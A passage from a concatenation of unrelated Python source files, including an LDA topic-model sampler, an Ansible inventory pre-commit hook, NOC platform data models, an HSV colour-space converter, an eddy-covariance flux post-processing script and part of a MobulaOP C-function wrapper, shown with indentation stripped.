Gamma(z) = Integral(0,infinity) of t^(z-1)exp(-t) dt.
(Adapted from: Numerical Recipes in C.)
Usage: lgammln(xx)
Copied from stats.py by strang@nmr.mgh.harvard.edu
"""
coeff = [76.18009173, -86.50532033, 24.01409822, -1.231739516,
0.120858003e-2, -0.536382e-5]
x = xx - 1.0
tmp = x + 5.5
tmp = tmp - (x+0.5)*log(tmp)
ser = 1.0
for j in range(len(coeff)):
x = x + 1
ser = ser + coeff[j]/x
return -tmp + log(2.50662827465*ser)
def log_sum(log_a, log_b):
if log_a < log_b:
return log_b + log(1 + exp(log_a - log_b))
else:
return log_a + log(1 + exp(log_b - log_a))
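# Example: log_sum(log(0.2), log(0.3)) equals log(0.5) up to float error,
# computed without leaving log space, which avoids underflow for tiny
# probabilities:
# assert abs(exp(log_sum(log(0.2), log(0.3))) - 0.5) < 1e-12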
def log_normalize(dist):
normalizer = reduce(log_sum, dist)
for ii in xrange(len(dist)):
dist[ii] -= normalizer
return dist
def log_sample(dist):
"""
Sample a key from a dictionary using the values as probabilities (unnormalized)
"""
cutoff = random()
dist = log_normalize(dist)
#print "Normalizer: ", normalizer
current = 0
for ii in xrange(len(dist)):
current += exp(dist[ii])
if current >= cutoff:
#print "Chose", i
return ii
assert False, "Didn't choose anything: %f %f" % (cutoff, current)
def create_data(stories, lang="english", doc_limit=-1, delimiter=""):
from nltk.tokenize.treebank import TreebankWordTokenizer
tokenizer = TreebankWordTokenizer()
from nltk.corpus import stopwords
stop = stopwords.words(lang)
from string import ascii_lowercase
docs = {}
print("Found %i stories" % stories.count())
for story in stories:
text = zlib.decompress(story.story_content_z)
# text = story.story_title
text = ''.join(BeautifulSoup(text).findAll(text=True)).lower()
if delimiter:
sections = text.split(delimiter)
else:
sections = [text]
if doc_limit > 0 and len(docs) > doc_limit:
print("Passed doc limit %i" % len(docs))
break
print(story.story_title, len(sections))
for jj in xrange(len(sections)):
docs["%s-%i" % (story.story_title, jj)] = [x for x in tokenizer.tokenize(sections[jj]) \
if (not x in stop) and \
(min(y in ascii_lowercase for y in x))]
return docs
class LdaSampler:
def __init__(self, num_topics, doc_smoothing = 0.1, topic_smoothing = 0.01):
self._docs = defaultdict(FreqDist)
self._topics = defaultdict(FreqDist)
self._K = num_topics
self._state = None
self._alpha = doc_smoothing
self._lambda = topic_smoothing
def optimize_hyperparameters(self, samples=5, step = 3.0):
rawParam = [log(self._alpha), log(self._lambda)]
for ii in xrange(samples):
lp_old = self.lhood(self._alpha, self._lambda)
lp_new = log(random()) + lp_old
print("OLD: %f\tNEW: %f at (%f, %f)" % (lp_old, lp_new, self._alpha, self._lambda))
l = [x - random() * step for x in rawParam]
r = [x + step for x in rawParam]
for jj in xrange(100):
rawParamNew = [l[x] + random() * (r[x] - l[x]) for x in xrange(len(rawParam))]
trial_alpha, trial_lambda = [exp(x) for x in rawParamNew]
lp_test = self.lhood(trial_alpha, trial_lambda)
#print("TRYING: %f (need %f) at (%f, %f)" % (lp_test - lp_old, lp_new - lp_old, trial_alpha, trial_lambda))
if lp_test > lp_new:
print(jj)
self._alpha = exp(rawParamNew[0])
self._lambda = exp(rawParamNew[1])
self._alpha_sum = self._alpha * self._K
self._lambda_sum = self._lambda * self._W
rawParam = [log(self._alpha), log(self._lambda)]
break
else:
for dd in xrange(len(rawParamNew)):
if rawParamNew[dd] < rawParam[dd]:
l[dd] = rawParamNew[dd]
else:
r[dd] = rawParamNew[dd]
assert l[dd] <= rawParam[dd]
assert r[dd] >= rawParam[dd]
print("\nNew hyperparameters (%i): %f %f" % (jj, self._alpha, self._lambda))
def lhood(self, doc_smoothing, voc_smoothing):
doc_sum = doc_smoothing * self._K
voc_sum = voc_smoothing * self._W
val = 0.0
val += lgammln(doc_sum) * len(self._docs)
val -= lgammln(doc_smoothing) * self._K * len(self._docs)
for ii in self._docs:
for jj in xrange(self._K):
val += lgammln(doc_smoothing + self._docs[ii][jj])
val -= lgammln(doc_sum + self._docs[ii].N())
val += lgammln(voc_sum) * self._K
val -= lgammln(voc_smoothing) * self._W * self._K
for ii in self._topics:
for jj in self._vocab:
val += lgammln(voc_smoothing + self._topics[ii][jj])
val -= lgammln(voc_sum + self._topics[ii].N())
return val
def initialize(self, data):
"""
Data should be keyed by doc-id, values should be iterable
"""
self._alpha_sum = self._alpha * self._K
self._state = defaultdict(dict)
self._vocab = set([])
for dd in data:
for ww in xrange(len(data[dd])):
# Learn all the words we'll see
self._vocab.add(data[dd][ww])
# Initialize the state to unassigned
self._state[dd][ww] = -1
self._W = len(self._vocab)
self._lambda_sum = float(self._W) * self._lambda
self._data = data
print("Initialized vocab of size %i" % len(self._vocab))
def prob(self, doc, word, topic):
val = log(self._docs[doc][topic] + self._alpha)
# This is constant across a document, so we don't need to compute this term
# val -= log(self._docs[doc].N() + self._alpha_sum)
val += log(self._topics[topic][word] + self._lambda)
val -= log(self._topics[topic].N() + self._lambda_sum)
# print doc, word, topic, self._docs[doc][topic], self._topics[topic][word]
return val
def sample_word(self, doc, position):
word = self._data[doc][position]
old_topic = self._state[doc][position]
if old_topic != -1:
self.change_count(doc, word, old_topic, -1)
probs = [self.prob(doc, self._data[doc][position], x) for x in xrange(self._K)]
new_topic = log_sample(probs)
#print doc, word, new_topic
self.change_count(doc, word, new_topic, 1)
self._state[doc][position] = new_topic
def change_count(self, doc, word, topic, delta):
self._docs[doc].inc(topic, delta)
self._topics[topic].inc(word, delta)
def sample(self, iterations = 100, hyper_delay = 10):
assert self._state
for ii in xrange(iterations):
for dd in self._data:
for ww in xrange(len(self._data[dd])):
self.sample_word(dd, ww)
print("Iteration %i %f" % (ii, self.lhood(self._alpha, self._lambda)))
if hyper_delay >= 0 and ii % hyper_delay == 0:
self.optimize_hyperparameters()
def print_topics(self, num_words=15):
for ii in self._topics:
print("%i:%s\n" % (ii, "\t".join(self._topics[ii].keys()[:num_words])))
if __name__ == "__main__":
stories = MStory.objects(story_feed_id=199)
d = create_data(stories, doc_limit=250, delimiter="")
lda = LdaSampler(5)
lda.initialize(d)
lda.sample(50)
lda.print_topics() |
import subprocess
import argparse
from typing import Optional, Sequence
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
args = parser.parse_args(argv)
result = 0
for filename in args.filenames:
cp = subprocess.run(
['ansible-inventory','--list','-i',filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if cp.stderr:
print(f"ansible-inventory failed on file {filename} with the following output:")
print(cp.stderr.decode())
result = 1
return result
if __name__ == '__main__':
exit(main())
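# Example .pre-commit-config.yaml entry for this hook (a sketch; the id,
# name and script path are assumptions, not part of this file):
#
# - repo: local
#   hooks:
#     - id: ansible-inventory
#       name: validate ansible inventories
#       entry: python check_ansible_inventory.py
#       language: system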
|
# ----------------------------------------------------------------------
# DefaultPlatformItem
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import datetime
from typing import Optional, List
# Third-party modules
from pydantic import BaseModel
# NOC modules
from .utils import Reference
from .label import LabelItem
class DefaultPlatformItem(BaseModel):
id: str
name: str
full_name: Optional[str]
description: Optional[str]
vendor: Reference
start_of_sale: Optional[datetime.datetime]
end_of_sale: Optional[datetime.datetime]
end_of_support: Optional[datetime.datetime]
end_of_xsupport: Optional[datetime.datetime]
snmp_sysobjectid: Optional[str]
aliases: Optional[List[str]]
labels: List[LabelItem]
uuid: Optional[str]
effective_labels: List[LabelItem]
bi_id: Optional[str]
class FormPlatformItem(BaseModel):
name: str
vendor: Reference
description: Optional[str]
start_of_sale: Optional[datetime.datetime]
end_of_sale: Optional[datetime.datetime]
end_of_support: Optional[datetime.datetime]
end_of_xsupport: Optional[datetime.datetime]
snmp_sysobjectid: Optional[str]
labels: Optional[List[str]]
|
import numpy as np
import cv2
from clize import run
def convert_HSV_to_IJSV(img_arr):
height, width, depth = img_arr.shape
res = np.zeros((height, width, 4), np.uint8)
hue = img_arr[:,:,0]
sat = img_arr[:,:,1]
val = img_arr[:,:,2]
res[:,:,2] = sat
res[:,:,3] = val
y = 0
while y < height:
# hue is uint8 in [0, 179] (OpenCV convention); cast to float before
# doubling to degrees, otherwise hue values above 127 overflow uint8
row = hue[y,:].astype(np.float64) * 2
rad_arr = np.deg2rad(row)
# encode hue as a point on a circle of radius 127 centred at (127, 127)
row_i = np.round(np.cos(rad_arr) * 127 + 127)
row_j = np.round(np.sin(rad_arr) * 127 + 127)
res[y,:,0] = row_i.astype(np.uint8)
res[y,:,1] = row_j.astype(np.uint8)
y += 1
return res
def convert_IJSV_to_HSV(img_arr):
height, width, depth = img_arr.shape
res = np.zeros((height, width, 3), np.uint8)
hue_i = img_arr[:,:,0]
hue_j = img_arr[:,:,1]
sat = img_arr[:,:,2]
val = img_arr[:,:,3]
res[:,:,1] = sat
res[:,:,2] = val
y = 0
while y < height:
row_i = hue_i[y,:]
row_j = hue_j[y,:]
row_i = row_i.astype(np.float64)
row_j = row_j.astype(np.float64)
row_i = np.subtract(row_i, 127)
row_j = np.subtract(row_j, 127)
hue_row = np.arctan2(row_j, row_i)
hue_row = np.rad2deg(hue_row)
hue_row = np.add(hue_row, 360)
hue_row = np.mod(hue_row, 360)
hue_row = np.divide(hue_row, 2)
hue_row = np.round(hue_row)
hue_row = hue_row.astype(np.uint8)
res[y,:,0] = hue_row
y += 1
return res
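# Quick sanity check (illustrative): hue is stored as a point on a circle of
# radius 127 centred at (127, 127), so a round trip should reproduce the
# original hue to within a unit of rounding error:
# hsv = np.zeros((1, 1, 3), np.uint8); hsv[0, 0] = (90, 200, 100)
# assert abs(int(convert_IJSV_to_HSV(convert_HSV_to_IJSV(hsv))[0, 0, 0]) - 90) <= 1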
def test(fpath):
img = cv2.imread(fpath, -1)
img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
img2 = convert_HSV_to_IJSV(img)
cv2.imshow("intermediate", img2)
img3 = convert_IJSV_to_HSV(img2)
img4 = cv2.cvtColor(img3, cv2.COLOR_HSV2BGR)
cv2.imshow("converted", img4)
cv2.waitKey()
if __name__ == "__main__":
run(test)
|
#!/usr/bin/env python
"""
This script runs post-processing steps for Eddy covariance data coming
in one file in the format of europe-fluxdata.eu. This format is very similar
to the ICOS format (the only known difference is the unit of pressure,
which is hPa in europe-fluxdata.eu and kPa in ICOS).
The script covers the following steps:
- spike / outlier detection with mean absolute deviation filter
after Papale et al. (Biogeosci, 2006)
- ustar filtering after Papale et al. (Biogeosci, 2006)
- carbon flux partitioning with the nighttime method
of Reichstein et al. (Global Change Biolo, 2005) and
the daytime method of Lasslop et al. (Global Change Biolo, 2010)
- gap filling with marginal distribution sampling (MDS)
of Reichstein et al. (Global Change Biolo, 2005)
- flux error estimates using MDS after Lasslop et al. (Biogeosci, 2008)
The script is controlled by a config file in Python's standard configparser
format. The config file includes all possible parameters of used routines.
Default parameter values follow the package REddyProc where appropriate. See
comments in config file for details.
The script currently flags on input all NaN values and given *undefined*
values. Variables should be set to *undefined* in case of other existing flags
before calling the script. Otherwise it should be easy to set the appropriate
flags in the pandas DataFrame dff for the flags after its creation around line
160.
The output file can either have all flagged variables set to *undefined*
and/or can include flag columns for each variable (see config file).
Note, ustar filtering needs at least one full year.
Examples
--------
python postproc_europe-fluxdata.py hesseflux_example.cfg
History
-------
Written, Matthias Cuntz, April 2020
"""
from __future__ import division, absolute_import, print_function
import time as ptime
import sys
import configparser
import os.path
import datetime as dt
import numpy as np
import pandas as pd
import hesseflux as hf
#
# Find first elements in names that begin with elements of starts
def _findfirststart(starts, names):
"""
Find first elements in names that begin with elements of starts
Example
-------
>>> hout = _findfirststart(['TA', 'LE'],
['TIMESTAMP', 'TAU_1_1_1',
'H_1_1_1', 'LE_1_1_1',
'TA_1_1_1', 'TA_1_2_1', 'LE_PI_1_1_1'])
>>> print(hout)
TAU_1_1_1 LE_1_1_1
"""
hout = []
for hh in starts:
for cc in names:
if cc.startswith(hh):
hout.append(cc)
break
return hout
if __name__ == '__main__':
t1 = ptime.time()
# ToDo
# - Allow more flexibility in column names
# Read config file
if len(sys.argv) <= 1:
raise IOError('Input configuration file must be given.')
configfile = sys.argv[1]
config = configparser.ConfigParser(interpolation=None)
config.read(configfile)
# file path
outdir = config['GENERAL'].get('outdir', ".")
# program switches
outlier = config['POSTSWITCH'].getboolean('outlier', True)
ustar = config['POSTSWITCH'].getboolean('ustar', True)
partition = config['POSTSWITCH'].getboolean('partition', True)
fill = config['POSTSWITCH'].getboolean('fill', True)
fluxerr = config['POSTSWITCH'].getboolean('fluxerr', True)
# input file
eufluxfile = config['POSTIO'].get('inputfile', '')
timeformat = config['POSTIO'].get('timeformat', '%Y%m%d%H%M')
sep = config['POSTIO'].get('sep', ',')
skiprows = config['POSTIO'].get('skiprows', '')
undef = config['POSTIO'].getfloat('undef', -9999.)
swthr = config['POSTIO'].getfloat('swthr', 10.)
outputfile = config['POSTIO'].get('outputfile', '')
outundef = config['POSTSWITCH'].getboolean('outundef', True)
outflagcols = config['POSTSWITCH'].getboolean('outflagcols', False)
# mad
nscan = config['POSTMAD'].getint('nscan', 15)
nfill = config['POSTMAD'].getint('nfill', 1)
z = config['POSTMAD'].getfloat('z', 7)
deriv = config['POSTMAD'].getint('deriv', 2)
# ustar
ustarmin = config['POSTUSTAR'].getfloat('ustarmin', 0.1)
nboot = config['POSTUSTAR'].getint('nboot', 1)
plateaucrit = config['POSTUSTAR'].getfloat('plateaucrit', 0.95)
seasonout = config['POSTUSTAR'].getboolean('seasonout', False)
applyustarflag = config['POSTUSTAR'].getboolean('applyflag', False)
# gap-filling
sw_dev = config['POSTGAP'].getfloat('sw_dev', 50.)
ta_dev = config['POSTGAP'].getfloat('ta_dev', 2.5)
vpd_dev = config['POSTGAP'].getfloat('vpd_dev', 5.0)
longgap = config['POSTGAP'].getint('longgap', 60)
# partitioning
nogppnight = config['POSTPARTITION'].getboolean('nogppnight', False)
# ----------------------------------------------------------------
# Check call
# Assert iterable
if ',' in eufluxfile:
eufluxfile = eufluxfile.split(',')
eufluxfile = [ ee.strip() for ee in eufluxfile ]
else:
if eufluxfile:
eufluxfile = [eufluxfile]
else:
try:
eufluxfile = hf.files_from_gui(
initialdir='.', title='europe-fluxdata.eu file(s)')
except Exception:
raise IOError("GUI for europe-fluxdata.eu file(s) failed.")
if skiprows == 'None':
skiprows = ''
if skiprows:
import json # to analyse int or list, tuple not working
skiprows = json.loads(skiprows.replace('(', '[').replace(')', ']'))
# ----------------------------------------------------------------
# Read input files into Panda data frame and check variable availability
print('Read data ', eufluxfile)
t01 = ptime.time()
# TIMESTAMP,TAU_1_1_1,H_1_1_1,LE_1_1_1,FC_1_1_1,...
# 201901010030,0.0941,-11.0765,-9999.0000,-9999.0000,...
# use lambda because of global var timeformat
parser = lambda date: dt.datetime.strptime(date, timeformat)
infile = eufluxfile[0]
df = pd.read_csv(infile, sep, skiprows=skiprows, parse_dates=[0],
date_parser=parser, index_col=0, header=0)
if len(eufluxfile) > 1:
for infile in eufluxfile[1:]:
df1 = pd.read_csv(infile, sep, skiprows=skiprows, parse_dates=[0],
date_parser=parser, index_col=0, header=0)
df = df.append(df1, sort=False)
df.fillna(undef, inplace=True)
# df.replace(-9999., np.nan, inplace=True)
# Flag
dff = df.copy(deep=True).astype(int)
dff[:] = 0
dff[df == undef] = 2
# dff[df.isna()] = 2
# day / night
isday = df['SW_IN_1_1_1'] > swthr
# Check Ta in Kelvin
hta = ['TA_']
hout = _findfirststart(hta, df.columns)
if df[hout[0]].max() < 100.:
tkelvin = 273.15
else:
tkelvin = 0.
# add tkelvin only where not flagged
df.loc[dff[hout[0]] == 0, hout[0]] += tkelvin
# add vpd if not given
hvpd = ['VPD']
hout = _findfirststart(hvpd, df.columns)
if len(hout) == 0:
hvpd = ['TA_', 'RH_']
hout = _findfirststart(hvpd, df.columns)
if len(hout) != 2:
raise ValueError('Cannot calculate VPD.')
ta_id = hout[0]
rh_id = hout[1]
if df[ta_id].max() < 100.:
tk = df[ta_id] + 273.15
else:
tk = df[ta_id]
if df[rh_id].max() > 10.:
rh = df[rh_id] / 100.
else:
rh = df[rh_id]
vpd = (1. - rh) * hf.esat(tk)
vpd_id = 'VPD_PI_1_1_1'
df[vpd_id] = vpd
df[vpd_id].where((df[ta_id] != undef) | (df[rh_id] != undef),
other=undef, inplace=True)
dff[vpd_id] = np.where((dff[ta_id] + dff[rh_id]) > 0, 2, 0)
df.loc[dff[vpd_id] == 0, vpd_id] /= 100.
# Check VPD in Pa
hvpd = ['VPD']
hout = _findfirststart(hvpd, df.columns)
if df[hout[0]].max() < 10.: # kPa
vpdpa = 1000.
elif df[hout[0]].max() < 100.: # hPa
vpdpa = 100.
else:
vpdpa = 1. # Pa
df.loc[dff[hout[0]] == 0, hout[0]] *= vpdpa
# time stepping
dsec = (df.index[1] - df.index[0]).seconds
ntday = np.rint(86400 / dsec).astype(int)
t02 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t02 - t01) / 60.)
if (t02 - t01) > 60.
else '[s]: {:d}'.format(int(t02 - t01)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Outlier detection
if outlier:
print('Spike detection')
t11 = ptime.time()
# assume *_PI variables after raw variables, e.g. LE before LE_PI,
# if available
houtlier = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE']
# houtlier = ['FC', 'NEE']
hout = _findfirststart(houtlier, df.columns)
print(' Using', hout)
# ToDo
# - only one call to mad for all variables
sflag = hf.madspikes(df[hout], flag=dff[hout], isday=isday,
undef=undef, nscan=nscan * ntday,
nfill=nfill * ntday, z=z, deriv=deriv, plot=False)
for ii, hh in enumerate(hout):
dff.loc[sflag[hh] == 2, hh] = 3
t12 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t12 - t11) / 60.)
if (t12 - t11) > 60.
else '[s]: {:d}'.format(int(t12 - t11)) )
print(' in ', strin)
# ----------------------------------------------------------------
# u* filtering
if ustar:
print('u* filtering')
t21 = ptime.time()
hfilt = ['NEE', 'USTAR', 'TA_']
hout = _findfirststart(hfilt, df.columns)
if len(hout) == 2: # take FC if NEE not in input file
hfilt = ['FC', 'USTAR', 'TA_']
hout = _findfirststart(hfilt, df.columns)
assert len(hout) == 3, 'Could not find CO2 flux (NEE or FC), USTAR or TA in input file.'
print(' Using', hout)
ffsave = dff[hout[0]].to_numpy()
iic = np.where((~isday) & (df[hout[0]] < 0.))[0]
dff.iloc[iic, list(df.columns).index(hout[0])] = 4
ustars, flag = hf.ustarfilter(df[hout], flag=dff[hout],
isday=isday, undef=undef,
ustarmin=ustarmin, nboot=nboot,
plateaucrit=plateaucrit,
seasonout=seasonout,
plot=True)
dff[hout[0]] = ffsave
df = df.assign(USTAR_TEST_1_1_1=flag)
dff = dff.assign(USTAR_TEST_1_1_1=np.zeros(df.shape[0], dtype=int))
if applyustarflag:
# assume *_PI variables after raw variables, e.g. LE before LE_PI
# if available
hustar = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE']
hout = _findfirststart(hustar, df.columns)
print(' Using', hout)
for ii, hh in enumerate(hout):
dff.loc[flag == 2, hh] = 5
t22 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t22 - t21) / 60.)
if (t22 - t21) > 60.
else '[s]: {:d}'.format(int(t22 - t21)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Flux partitioning
if partition:
print('Flux partitioning')
t41 = ptime.time()
hpart = ['NEE', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hpart, df.columns)
if len(hout) == 3: # take FC if NEE not in input file
hpart = ['FC', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hpart, df.columns)
print(' Using', hout)
astr = 'Could not find CO2 flux (NEE or FC), SW_IN, TA, or VPD in input file.'
assert len(hout) == 4, astr
# nighttime method
print(' Nighttime partitioning')
dfpartn = hf.nee2gpp(df[hout], flag=dff[hout], isday=isday,
undef=undef, method='reichstein',
nogppnight=nogppnight)
if hout[0].startswith('NEE'):
suff = hout[0][3:-1]
else:
suff = hout[0][2:-1]
dfpartn.rename(columns=lambda c: c + suff + '1', inplace=True)
# daytime method
print(' Daytime partitioning')
dfpartd = hf.nee2gpp(df[hout], flag=dff[hout], isday=isday,
undef=undef, method='lasslop',
nogppnight=nogppnight)
dfpartd.rename(columns=lambda c: c + suff + '2', inplace=True)
df = pd.concat([df, dfpartn, dfpartd], axis=1)
# take flags from NEE
for dn in ['1', '2']:
for gg in ['GPP', 'RECO']:
dff[gg + suff + dn] = dff[hout[0]]
# flag if partitioning was not possible
for dn in ['1', '2']:
for gg in ['GPP', 'RECO']:
dff.loc[df[gg + suff + dn] == undef, gg + suff + dn] = 2
t42 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t42 - t41) / 60.)
if (t42 - t41) > 60.
else '[s]: {:d}'.format(int(t42 - t41)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Gap-filling
if fill:
print('Gap-filling')
t31 = ptime.time()
hfill = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
assert len(hout) == 3, 'Could not find SW_IN, TA or VPD in input file.'
# assume *_PI variables after raw variables, e.g. LE before LE_PI
# if available
hfill = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE',
'GPP_1_1_1', 'RECO_1_1_1',
'GPP_1_1_2', 'RECO_1_1_2',
'GPP_PI_1_1_1', 'RECO_PI_1_1_1',
'GPP_PI_1_1_2', 'RECO_PI_1_1_2',
'SW_IN', 'TA_', 'VPD']
# hfill = ['NEE', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
print(' Using', hout)
df_f, dff_f = hf.gapfill(df[hout], flag=dff[hout],
sw_dev=sw_dev, ta_dev=ta_dev, vpd_dev=vpd_dev,
longgap=longgap, undef=undef, err=False,
verbose=1)
hdrop = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hdrop, df.columns)
df_f.drop(columns=hout, inplace=True)
dff_f.drop(columns=hout, inplace=True)
def _add_f(c):
return '_'.join(c.split('_')[:-3] + ['f'] + c.split('_')[-3:])
df_f.rename(columns=_add_f, inplace=True)
dff_f.rename(columns=_add_f, inplace=True)
df = pd.concat([df, df_f], axis=1)
dff = pd.concat([dff, dff_f], axis=1)
t32 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t32 - t31) / 60.)
if (t32 - t31) > 60.
else '[s]: {:d}'.format(int(t32 - t31)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Error estimate
if fluxerr:
print('Flux error estimates')
t51 = ptime.time()
hfill = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
assert len(hout) == 3, 'Could not find SW_IN, TA or VPD in input file.'
# assume *_PI variables after raw variables, e.g. LE before LE_PI
# if available
hfill = ['H_', 'LE', 'FC',
'H_PI', 'LE_PI', 'NEE',
'H_f', 'LE_f', 'FC_f',
'H_PI_f', 'LE_PI_f', 'NEE_f', 'NEE_PI_f',
'GPP_1_1_1', 'RECO_1_1_1',
'GPP_1_1_2', 'RECO_1_1_2',
'GPP_f_1_1_1', 'RECO_f_1_1_1',
'GPP_f_1_1_2', 'RECO_f_1_1_2',
'GPP_PI_1_1_1', 'RECO_PI_1_1_1',
'GPP_PI_1_1_2', 'RECO_PI_1_1_2',
'GPP_PI_f_1_1_1', 'RECO_PI_f_1_1_1',
'GPP_PI_f_1_1_2', 'RECO_PI_f_1_1_2',
'SW_IN', 'TA_', 'VPD']
# hfill = ['NEE', 'GPP', 'SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hfill, df.columns)
print(' Using', hout)
df_f = hf.gapfill(df[hout], flag=dff[hout],
sw_dev=sw_dev, ta_dev=ta_dev, vpd_dev=vpd_dev,
longgap=longgap, undef=undef, err=True, verbose=1)
hdrop = ['SW_IN', 'TA_', 'VPD']
hout = _findfirststart(hdrop, df.columns)
df_f.drop(columns=hout, inplace=True)
colin = list(df_f.columns)
# names such as: NEE_PI_err_1_1_1
def _add_e(c):
# analogous to _add_f in the gap-filling step, but inserts 'err' so the
# error columns do not collide with the gap-filled '_f_' columns
return '_'.join(c.split('_')[:-3] + ['err'] + c.split('_')[-3:])
df_f.rename(columns=_add_e, inplace=True)
colout = list(df_f.columns)
df = pd.concat([df, df_f], axis=1)
# take flags of non-error columns
for cc in range(len(colin)):
dff[colout[cc]] = dff[colin[cc]]
t52 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t52 - t51) / 60.)
if (t52 - t51) > 60.
else '[s]: {:d}'.format(int(t52 - t51)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Output
if not outputfile:
try:
outputdir = hf.directory_from_gui(initialdir='.',
title='Output directory')
except Exception:
raise IOError("GUI for output directory failed.")
outputfile = configfile[:configfile.rfind('.')]
outputfile = outputdir + '/' + os.path.basename(outputfile + '.csv')
print('Write output ', outputfile)
t61 = ptime.time()
# Back to original units
hta = ['TA_']
hout = _findfirststart(hta, df.columns)
df.loc[dff[hout[0]] == 0, hout[0]] -= tkelvin
hvpd = ['VPD']
hout = _findfirststart(hvpd, df.columns)
df.loc[dff[hout[0]] == 0, hout[0]] /= vpdpa
if outundef:
print(' Set flags to undef.')
for cc in df.columns:
if cc.split('_')[-4] != 'f': # exclude gap-filled columns
df[cc].where(dff[cc] == 0, other=undef, inplace=True)
if outflagcols:
print(' Add flag columns.')
def _add_flag(c):
return 'flag_' + c
dff.rename(columns=_add_flag, inplace=True)
# no flag columns for flags
dcol = []
for hh in dff.columns:
if '_TEST_' in hh:
dcol.append(hh)
if dcol:
dff.drop(columns=dcol, inplace=True)
df = pd.concat([df, dff], axis=1)
else:
print(' Add flag columns for gap-filled variables.')
occ = []
for cc in df.columns:
if cc.split('_')[-4] == 'f':
occ.append(cc)
dff1 = dff[occ].copy(deep=True)
dff1.rename(columns=lambda c: 'flag_' + c, inplace=True)
df = pd.concat([df, dff1], axis=1)
print(' Write.')
df.to_csv(outputfile, sep=sep, na_rep=str(undef), index=True,
date_format=timeformat)
t62 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t62 - t61) / 60.)
if (t62 - t61) > 60.
else '[s]: {:d}'.format(int(t62 - t61)) )
print(' in ', strin)
# ----------------------------------------------------------------
# Finish
t2 = ptime.time()
strin = ( '[m]: {:.1f}'.format((t2 - t1) / 60.)
if (t2 - t1) > 60.
else '[s]: {:d}'.format(int(t2 - t1)) )
print('Time elapsed', strin)
|
import ctypes
import os
import hashlib
from . import glue
from .dtype import DType, TemplateType, UnknownCType
def get_func_idcode(func_name, arg_types):
arg_types_str = ','.join([e.cname for e in arg_types])
idcode = '{func_name}:{arg_types_str}'.format(
func_name=func_name,
arg_types_str=arg_types_str)
return idcode
def get_idcode_hash(idcode):
sp = idcode.split(':')
func_name = sp[0]
md5 = hashlib.md5()
md5.update(idcode[len(func_name)+1:].encode('utf-8'))
return '{}_{}'.format(func_name, md5.hexdigest()[:8])
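# Example (illustrative): for a function 'add' whose two arguments have
# cname 'float*', get_func_idcode gives 'add:float*,float*' and
# get_idcode_hash turns it into 'add_' plus the first 8 hex digits of the
# md5 of everything after the colon.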
gpu_ctx_name = None
for gpu_ctx in ['cuda', 'hip']:
gpu_lib_fname = os.path.join(os.path.dirname(__file__), 'build',
'mobula_op_{}.so'.format(gpu_ctx))
if os.path.exists(gpu_lib_fname):
gpu_ctx_name = gpu_ctx
break
class CFuncDef:
def __init__(self, func_name, arg_names=None, arg_types=None, rtn_type=None,
template_list=None, loader=None, loader_kwargs=None):
# use None defaults to avoid sharing mutable default lists across instances
self.func_name = func_name
self.arg_names = arg_names if arg_names is not None else []
self.arg_types = arg_types
self.rtn_type = rtn_type
self.template_list = template_list if template_list is not None else []
self.loader = loader
self.loader_kwargs = loader_kwargs
def __call__(self, arg_datas, arg_types, dev_id):
if dev_id is None:
ctx = 'cpu'
dev_id = -1
else:
ctx = gpu_ctx_name
# function loader
func = self.loader(self, arg_types, ctx, **self.loader_kwargs)
return func(dev_id, *arg_datas)
class MobulaFunc:
"""An encapsulation for CFunction
"""
def __init__(self, name, func):
self.name = name
self.par_name = func.arg_names
self.par_type = func.arg_types
self.func = func
def __call__(self, *args, **kwargs):
def args_gen():
i = 0
for a in args:
yield a
i += 1
num_pars = len(self.par_name)
while i < num_pars:
yield kwargs[self.par_name[i]]
i += 1
# type check
arg_datas = []
dev_id = None
noncontiguous_list = []
temp_list = []
arg_types = []
template_mapping = dict()
def wait_to_read(var):
if hasattr(var, 'wait_to_read'):
var.wait_to_read()
def wait_to_write(var):
if hasattr(var, 'wait_to_write'):
var.wait_to_write()
def _var_wait(var, ptype):
if ptype.is_pointer:
if ptype.is_const:
# input
wait_to_read(var)
else:
# output
wait_to_write(var)
# Pre-process
for var, ptype in zip(args_gen(), self.par_type):
_var_wait(var, ptype)
def analyze_element(var, ptype, noncontiguous_list, template_mapping):
"""Analyze an element
Parameters
----------
var : variable
ptype : data type
noncontiguous_list : list
the list of noncontiguous variables
template_mapping : dict
the mapping from template name to ctype
"""
assert isinstance(ptype, (DType, TemplateType)),\
TypeError('Unknown Data Type: {}'.format(type(ptype)))
if ptype.is_pointer:
backend = glue.backend.get_var_backend(var)
data = backend.get_pointer(var)
if isinstance(data, (list, tuple)):
# data = (contiguous_array_pointer, contiguous_array_object)
if ptype.is_const:
temp_list.append(data[1]) # hold a reference
wait_to_read(data[1])
else:
noncontiguous_list.append((var, data[1]))
wait_to_write(data[1])
data = data[0]
dev_id = backend.dev_id(var)
ctype = ctypes.POINTER(backend.get_ctype(var))
if isinstance(ptype, DType):
expected_ctype = ptype.ctype
else:
if ptype.tname in template_mapping:
expected_ctype = template_mapping[ptype.tname]
else:
